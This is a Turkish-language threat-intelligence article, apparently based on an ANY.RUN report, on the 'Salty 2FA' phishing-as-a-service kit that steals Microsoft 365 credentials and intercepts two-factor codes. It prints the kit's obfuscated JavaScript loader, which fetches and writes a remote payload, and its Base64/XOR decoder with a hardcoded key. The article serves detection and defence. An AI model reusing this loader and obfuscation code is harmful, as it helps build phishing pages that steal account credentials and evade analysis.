“Salty 2FA” olarak adlandırılan gelişmiş yeni bir Hizmet Olarak Kimlik Avı (PHAAS) çerçevesi, ABD ve Avrupa endüstrileri içindeki Microsoft 365 kullanıcıları için önemli bir tehdit olarak ortaya çıktı.
Daha önce belgelenmemiş bu platform, kurumsal kimlik bilgilerini çalırken iki faktörlü kimlik doğrulama mekanizmalarını atlamak için özel olarak tasarlanmış gelişmiş gizleme teknikleri ve çok aşamalı yürütme zincirleri kullanır.
Çerçeve, dikkatle hazırlanmış kimlik avı kampanyaları aracılığıyla finans, telekomünikasyon, enerji, lojistik ve eğitim sektörlerini kapsayan kuruluşları hedeflemektedir.
Kötü amaçlı yazılım, “.com” bölgelerindeki bileşik alanları Rus “.ru” üst düzey alanlar altında kayıtlı alanlarla birleştiren benzersiz bir etki alanı altyapı modeli ile kendini ayırır.
.webp)
Bu ayırt edici eşleştirme, platformun geleneksel algılama sistemlerinden kaçmasına yardımcı olan karmaşık bir yönlendirme ve yük dağıtım mekanizmaları oluşturur.
Mağdurlar, sahte sesli mesajlar, belge erişim istekleri ve onları Microsoft giriş kopyalarını ikna etmeye yönlendiren faturalandırma ifadeleri de dahil olmak üzere çeşitli yemleri içeren kimlik avı e -postaları alır.
RUN analistleri, farklı alanlar ve gizleme teknikleri kullanmasına rağmen benzer davranış kalıpları sergileyen birden fazla sanal alan oturumu keşfettiklerinde rutin kimlik avı kampanyası avı sırasında daha önce bilinmeyen bu PHAAS çerçevesini tanımladılar.
.webp)
Cloudflare turnikesi korumasının tutarlı kullanımı, ayırt edici alan eşleştirmesi ile birleştiğinde, bu kampanyaları potansiyel olarak ilişkili olarak işaretleyerek Salty 2FA’nın tam yeteneklerini ortaya çıkaran kapsamlı analize yol açtı.
Platform, push bildirimleri, SMS kodları, sesli çağrılar ve Authenticator uygulama jetonları dahil olmak üzere birden fazla iki faktörlü kimlik doğrulama yöntemini kesme ve işleme yeteneğinde sofistike olduğunu göstermektedir.
Bu yetenek, saldırıyı basit kimlik doğrulaması hırsızlığının ötesine uzatır ve tehdit aktörlerinin geleneksel 2FA korumaları mevcut olsa bile uzlaşmış hesaplara kalıcı erişimi sürdürmesine izin verir.
Çok aşamalı yürütme zinciri ve gizleme teknikleri
Salty 2FA’nın teknik mimarisi, analize ve tespiti direnmek için tasarlanmış özenle düzenlenmiş beş aşamalı bir yürütme sürecine dayanmaktadır.
.webp)
İlk aşama, statik analizi karmaşıklaştırmak için gürültü olarak ilham verici alıntı yorumları içeren giriş noktası olarak hizmet eden gizlenmiş bir JavaScript işleviyle başlar.
async function vitals() {
function whiz (math) {
return [...atob (math)].map((lewd, matchmaking, recklessness) =>
recklessness[0] ? String.fromCharCode((lewd.charCodeAt(0)-
recklessness[0].charCodeAt(0)+256)%256):"").join("");
}
if(sessionStorage[0]){
document.write(whiz(sessionStorage[0]));
return;
}
unearned = await(await fetch(await whiz(`1PwICAQHzsPDAfUG//kIBAD19/nGyPn9wgYJw8M=`))).text();
document.write(await whiz(unearned));
sessionStorage[0] = unearned;
}Çerçeve, Base64 ve XOR işlemlerini sabit bir şekilde oluşturulmuş bir değere sahip sofistike öğe kimliği kullanır ve dinamik analizi önemli ölçüde daha zor hale getirir.
Tüm ön uç mantığı, manipülasyondan önce özel bir rutin yoluyla kodlanması gereken dinamik olarak oluşturulan öğe tanımlayıcılarına yapılan çağrılara dayanır.
function decode(s) {
try {
var r="";
r = atob(s);
var d = '';
for (var i = 0; i < r.length; i++) {
d += String.fromCharCode(r.charCodeAt(i) ^
'b03e37d4502862adc85953d8ea0c4b6a'.charCodeAt(i %
'b03e37d4502862adc85953d8ea0c4b6a'.length));
}
return d;
} catch (e) {
return s;
}
}Platform, hata ayıklama araçları için klavye kısayolu engelleme ve kontrollü ortamları tespit etmek için yürütme süresi ölçümü dahil olmak üzere birden fazla anti-analiz mekanizması içerir.
Veri eksfiltrasyonu, oturumdan türetilmiş tuşlarla aynı XOR tekniğini kullanırken, çalınan kimlik bilgileri hem şifrelenmiş verileri hem de kod çözme parametrelerini içeren kodlanmış posta istekleri aracılığıyla Rusça barındıran sunuculara iletilir.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.